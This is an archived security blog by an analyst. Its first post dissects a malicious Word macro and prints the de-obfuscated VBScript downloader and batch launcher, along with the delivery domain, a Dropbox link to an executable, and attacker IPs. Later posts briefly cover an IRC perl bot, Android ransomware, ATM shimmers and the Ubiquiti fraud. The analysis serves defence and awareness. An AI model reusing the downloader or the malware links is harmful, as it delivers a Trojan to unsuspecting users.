Archive
Received a word file from someone – how bad could it be if you open it?
It used to be files that were executable (like .com, .exe .zip, .vbs, etc.) were bad to open when you received them in your email. Then came the pictures or URLs you received in your email because mail clients like Outlook would automatically preview them which results in running them without opening the email but how bad could it be to open a word document?
I wanted to spend a little time diving into what you might fine circulating around now…
I received a word document from an unknown sender so rather than opening the document I was able to load it on a diagnostic Linux server to see what is inside this document. (The concern is not for anything that is saved in the body of the document itself but rather the macros that come with the document.) ALERT – Geek stuff to follow…
As you view the code you may notice that someone has tried to obfuscate the code. This is evident by viewing some of the names of the functions and is common for developers who wish to make reverse engineering difficult.
Module1
This visual basic module is used to create the subroutine that will be executed and with a loop that continues to run (while true). It also creates a function that may be used to find the temp directory (Environ())
There is also a module that is responsible for creating the ‘work’ script and runs or executes the code. 
Below we see that the attackers are beginning to think smarter not harder. This URL uses a 302 redirect to re-establish the connection over a secure TLS channel to the same host. SSL traffic cannot be sniffed as easily so this is another attempt to obfuscate the traffic.
Finally after the third macro is run we have a connection to a website called mirai2000.com which starts the exploit. I have tried to un-obfuscate the connection by replacing the variables to 
come up with the following script;
strTecation = “pioneer9.exe”
frgea =”MSXML2.ServerXMLHTTP”
Set objXMLHTTP = CreateObject(frgea)
objXMLHTTP.open “GET”, paytina, False
objXMLHTTP.send()
ahdjqg = “ADODB.Stream”
Set objADOStream = CreateObject(ahdjqg)
objADOStream.Open
objADOStream.Type = 1
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0
objADOStream.SaveToFile strTecation
objADOStream.Close
$$
@echo off
:nqdjwkn
cscript.exe pioneercranberry.vbs
ping 2.2.1.1 -n 4
:windows
pioneer9.exe
:loop
ping 1.3.1.2 -n 1
del pioneercranberry.vbs
del pioneercranberry.bat
if exist pioneercranberry.bat goto loop
if exist pioneercranberry.vbs goto loop
exit
Analysis:
We see a script that is downloaded as pioneercranberry.vbs (GET /777763172631572.txt from mirai2000.com).
We then download a second file (GET /rara.txt which downloads a file from dropbox (https://www.dropbox.com/s/x3igq1hnugevjp0/3d8.exe?dl=1 that appears to be a windows firewall shell?) and save it as an executable (pioneer9).
When the file (pioneercranberry.vbs) is run we see a few ping requests to an IP address (2.2.1.1) in France (IP2000-ADSL-BAS).
Next we download an executable (Trojan) from an IP address (66.240.183.19) on the onx.com network using SSL.
Finally we send a single ping to an IP address (1.3.1.2) in China (CHINANET-GD)…hmmm.
I also see evidence of a teamviewer executable being downloaded (perhaps part of the Trojan above) but it fails to run because of a license issue from an IP address (178.255.155.118) in Italy (ANEXIA-NET).
——————————–
All of this activity because I opened a Microsoft Word document. All carefully obfuscated to evade Virus protection and Application level proxies and filters.
Sophos labels this Trojan as Troj/Agent-AOHW. Unfortunately as of this morning the site no longer works so I am unable to complete my analysis.
The moral of this story is…be careful when dealing with ANY file attachment in email. A good rule of thumb is if you didn’t ask for it DON’T open it.
Got Linux – great! – here is another bot script just for you
I have seen some activity recently in a honeypot I run that shows some automated scanning for apache. The intent of this automated scan seems to be to seek out and join an Apache server to an IRC botnet using perl. (For those of you unfamiliar with these terms I attempt to define them below).
HoneyPOT (a computer that is intentionally setup as a sacrifice to impersonate well known services that would be used such as apache for a web server, MySQL for a database, etc.)
BotNET (a collection of computers that can be used by one or more people to hijack your computer and use it to launch attacks, send spam, etc.)
In my research I observed an attempt to run a script being hosted on a server in Spain (7soles.com) that is downloaded from a website. It is then executed using perl and can provide a host of services including flooding attacks and spam.
For those of you still reading I have included the link to the script here. It’s not rocket science but it looks like a nicely tested platform – resembling a point and click malware using Internet Relay Chat as a command and control channel. It also looks like it is currently designed to be reporting into a site in Germany.
For most of my contemporaries this is old news but for the rest of you, welcome to the new Internet. Looks a lot like any North American city in the downtown core – watch your purse and get a carry permit for a handgun.
Its the FBI and we have your phone surrounded…
Just when you though it was safe to use your android smart phone there are several vulnerabilities you should be aware of (great now I need to monitor and patch my cell phones too? – yes Virginia, just one more thing you need to do this week).
There are reported connections from a Command and Control server (C2) located in Canada and Germany for a new ransomware for your phone that impersonates the FBI. Claiming that it detected pornographic images on your phone this message asks you to pay a fine of $500 and as proof it shows you a picture of yourself (taken with a front facing camera) and your Internet IP address of the phone (everyone has a data plan nowadays right?)
Using a hidden feature of your phone, it can wake your device out of idle and report in to a C2 every minute without any sign that it is doing so (you might be noticing that your battery life has gotten quite poor, this would probably require additional power). It will also give the attackers a way to connect to your device using a backdoor.
Read more about it here – http://blog.fortinet.com/post/locker-an-android-ransomware-full-of-surprises
Edit: This is just another variant of the same ransomware family reported earlier this year. (See here). Unfortunately there is no Anti Virus for mobile phones that have heuristic scanning so don’t rely on anything you have installed to protect you from these types of attacks.
Security industry reacts to Oracle’s CSO missive | CSO Online
Ever wonder where we will all be in 5 or 10 years? I would never had seen this coming – I mean this could be an example of professional hubris – read about how the chief security officer at Oracle thought it was time to tell it’s users to play nicely or ‘we will take our wagon away from you’.
This is just a glimpse of the next version of the end user license agreement (EULA) that we all just click on before using the software that it was written for. Judging from the industry reaction it could be a little ways off before a large company like oracle tries to flex it’s muscles but mark my words, reverse engineering software to find holes will likely lead us back to a time before open source. Companies should embrace the open architecture and provide a rich ‘bug bounty’ program if they do not have the talent inhouse to keep up with demand.
Read more on the article below and check out the archive of the post before it was pulled off the site.
Just when you thought it was safe to be a Canadian…
Mexicians are fast on their way to mastering the art of ATM fraud which is fortunate because Americans are still behind the times when it comes to chip and pin credit cards. I, for one, was happy to regale the benefits of Chip Cards until I read about this story.
ATM ‘Shimmer’ Found in Mexico http://krebsonsecurity.com/2015/08/chip-card-atm-shimmer-found-in-mexico/
Someone has now managed to create a card reader, complete with chip reader not the magnetic strip reader we all used to see and hear about. It is so small that it fits inside the card reader so you may never know that it is being used!
So much for chip and pin technology – what are we going to do now?
And now for something completely different…
Almost 35 years ago today Jeff Wayne prophesized about the end of the world as told by the great Richard burton in the musical version of War of the Worlds. Who would have guessed that the perseids meteor shower would be at it greatest tonight on August 12. (perseids-2015)
For those of you who have not heard the musical the story goes something like this…
“..at midnight on the 12th of August a huge mass of luminous gas erupted from Mars and sped toward earth. Across 200 million miles of void, invisibly hurtling towards us came the first of the missiles that were to bring so much calamity to earth.”
Shout out to all those Armageddon peddlers – maybe tonight really does mark the beginning of the end of the world… End of the World
Ubiquity breach a few months back…
http://www.sec.gov/Archives/edgar/data/1511737/000157104915006288/t1501817_8k.htm
In this securities and exchange commission filing Ubiquity Networks reports about a breach in which someone impersonated an employee in order to transfer funds with almost 50 million dollars.
After noticing the theft and contacting the necessary parties they were able to recover some of it but over 30 million still remains missing.
More for companies to worry about as the shift from data to cold hard cash begins. It’s time to get your computer networks in good order or you too can suffer the wrath
Security Analyst - Jeff Soehner CISSP, GXPN,GPYC,GMOB,GCIH 